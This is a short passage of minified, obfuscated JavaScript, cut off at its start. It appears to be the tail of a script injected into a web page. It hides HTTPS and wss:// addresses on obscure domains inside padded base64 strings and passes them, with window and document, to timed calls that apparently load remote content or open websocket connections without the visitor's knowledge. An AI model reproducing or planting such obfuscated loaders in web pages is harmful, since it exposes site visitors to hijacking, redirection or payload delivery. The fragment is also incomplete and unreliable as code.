l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};